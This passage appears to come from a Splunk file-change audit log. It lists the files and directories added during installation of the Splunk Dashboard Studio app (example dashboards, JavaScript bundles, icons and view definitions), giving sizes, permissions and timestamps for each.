isdir=0, size=115464, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-pie-chart-visualization.js", isdir=0, size=118048, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-nav-visualizations.js", isdir=0, size=41644, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.606, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-nav-search.js", isdir=0, size=28741, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.601, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-nav-inputs.js", isdir=0, size=28600, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.598, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-nav-defaults.js", isdir=0, size=26291, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.594, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-nav-complete.js", isdir=0, size=37859, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.591, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-multiselect-input.js", isdir=0, size=47611, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.588, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-master-data-governance-dashboard.js", isdir=0, size=126696, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.584, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-marker-gauge-visualization.js", isdir=0, size=106232, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-line-chart-visualization.js", isdir=0, size=157002, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.577, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-image-visualization.js", isdir=0, size=35116, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.573, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-icon-visualization.js", isdir=0, size=193976, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-healthcare-dashboard.js", isdir=0, size=88262, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.564, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-filler-gauge-visualization.js", isdir=0, size=99286, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.561, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-europe-telecom-network-hub-dashboard.js", isdir=0, size=245881, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.556, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-emergency-department-care-dashboard.js", isdir=0, size=66951, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-ecommerce-monitoring-dashboard.js", isdir=0, size=182570, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-dropdown-input.js", isdir=0, size=44971, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-datacenter-dashboard.js", isdir=0, size=242568, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.533, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-data-streaming-dashboard.js", isdir=0, size=73552, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.527, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-data-command-dashboard.js", isdir=0, size=366959, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.521, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-customer-satisfaction-dashboard.js", isdir=0, size=41518, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.514, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-custom-url-drilldown.js", isdir=0, size=37428, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.508, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-column-chart-visualization.js", isdir=0, size=173610, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.502, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-choropleth-svg-visualization.js", isdir=0, size=7966299, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.496, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-cascading-inputs.js", isdir=0, size=47873, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.490, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-buttercup-games-dashboard.js", isdir=0, size=47861, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.485, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-bubble-chart-visualization.js", isdir=0, size=142952, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-base-chain-data.js", isdir=0, size=59652, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-bar-chart-visualization.js", isdir=0, size=165611, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-assembly-line-dashboard.js", isdir=0, size=237700, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.470, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-area-chart-visualization.js", isdir=0, size=112694, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-airport-kpis-dashboard.js", isdir=0, size=78360, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-ad-hoc-data.js", isdir=0, size=45867, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.957, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/vendors.js.LICENSE.txt", isdir=0, size=37164, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.951, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/vendors.js", isdir=0, size=20788893, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.947, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/ts.worker.js.LICENSE.txt", isdir=0, size=818, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.943, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/ts.worker.js", isdir=0, size=4710445, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.939, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/runtime.js", isdir=0, size=1572, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.935, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/json.worker.js", isdir=0, size=234725, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.929, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/html.worker.js", isdir=0, size=541107, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.924, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:58.920, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/editor.worker.js", isdir=0, size=125758, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.915, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/dashboard.js", isdir=0, size=115092, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.911, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/css.worker.js", isdir=0, size=824720, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.906, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/9242107df7da7c6ad3cadf3133abcd37.ttf", isdir=0, size=56484, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.802, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-users__229c9a8c-1b2e-4978-9d7e-4222e1d7a9b3.svg", isdir=0, size=2418, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.796, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-server__3fcecd0d-1645-4745-bdec-9a612660b662.svg", isdir=0, size=1129, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.791, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-profile__f42da35c-8364-4004-94b8-ff02a7d0db83.svg", isdir=0, size=548, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.787, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-mobile__b5237b27-e8b3-4c1e-b247-341eea64a063.svg", isdir=0, size=428, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.783, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-load-balancer__4a4261a1-51e2-45aa-b89d-2911d1ceac62.svg", isdir=0, size=1255, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.779, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-laptop__52890fef-3a2c-46f8-bd0b-ed50e62b7290.svg", isdir=0, size=348, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.774, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-gear__c99f1d12-649f-433a-890a-bbf5cf548a6a.svg", isdir=0, size=2244, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.769, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-firewall__037c3797-3676-4b94-aa5f-01293cafab69.svg", isdir=0, size=2036, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.763, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-desktop__65679a5e-ea9f-4dfc-9a72-e31b0f8b10ef.svg", isdir=0, size=571, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-datastores__bc6a3e09-0548-405c-a5aa-916e6b8b5069.svg", isdir=0, size=5225, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.755, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-datastore__6267aa47-166b-4079-9801-df148e603b43.svg", isdir=0, size=2877, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-datacenters__440605f5-471f-4bba-ab7d-80e274222c77.svg", isdir=0, size=2218, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.747, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-datacenter__13a43013-4b5b-4553-a035-ebcb43b0bbcb.svg", isdir=0, size=938, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.742, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-cloud__b26f30f1-329e-4739-89ab-0a8a8bd24e7d.svg", isdir=0, size=1744, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.739, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-check__e29f784a-31a2-4544-813f-efce24d5be32.svg", isdir=0, size=460, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.735, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons/icon-active-directory__e03b60f5-d599-485e-bc89-67b86f2f80c7.svg", isdir=0, size=2118, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.631, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:58.626, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/icons", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:58.622, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:45:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:58.518, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:58.515, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:58.511, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/nav/default.xml", isdir=0, size=3482, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.507, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-world-map-visualization.xml", isdir=0, size=154, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.502, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-workplace-readiness.xml", isdir=0, size=151, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.499, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-workplace-readiness-detail.xml", isdir=0, size=158, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.493, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-vpn-health-by-region-dashboard.xml", isdir=0, size=152, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.487, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-visualization-datasource-defaults.xml", isdir=0, size=140, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.482, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-us-map-visualization.xml", isdir=0, size=151, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-text-visualization.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.474, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-text-input.xml", isdir=0, size=142, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.470, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-test-data.xml", isdir=0, size=148, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.464, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-table-chart-visualization.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.460, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-single-value-visualization.xml", isdir=0, size=144, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.456, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-single-value-radial-visualization.xml", isdir=0, size=151, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.452, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-shape-visualization.xml", isdir=0, size=148, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.448, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-scatter-chart-visualization.xml", isdir=0, size=139, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.442, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-saved-data.xml", isdir=0, size=156, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-punchcard-chart-visualization.xml", isdir=0, size=141, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.433, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-pie-chart-visualization.xml", isdir=0, size=135, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.429, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-nav-visualizations.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.425, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-nav-search.xml", isdir=0, size=152, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.422, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-nav-inputs.xml", isdir=0, size=150, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.418, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-nav-defaults.xml", isdir=0, size=155, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-nav-complete.xml", isdir=0, size=156, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.408, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-multiselect-input.xml", isdir=0, size=143, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.404, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-master-data-governance-dashboard.xml", isdir=0, size=153, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.400, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-marker-gauge-visualization.xml", isdir=0, size=144, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.396, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-line-chart-visualization.xml", isdir=0, size=136, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.392, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-image-visualization.xml", isdir=0, size=138, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.388, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-icon-visualization.xml", isdir=0, size=137, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-healthcare-dashboard.xml", isdir=0, size=155, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.379, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-filler-gauge-visualization.xml", isdir=0, size=144, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.375, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/default/data/ui/views/example-hub-europe-telecom-network-hub-dashboard.xml", isdir=0, size=158, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:58.371, user=n/a, 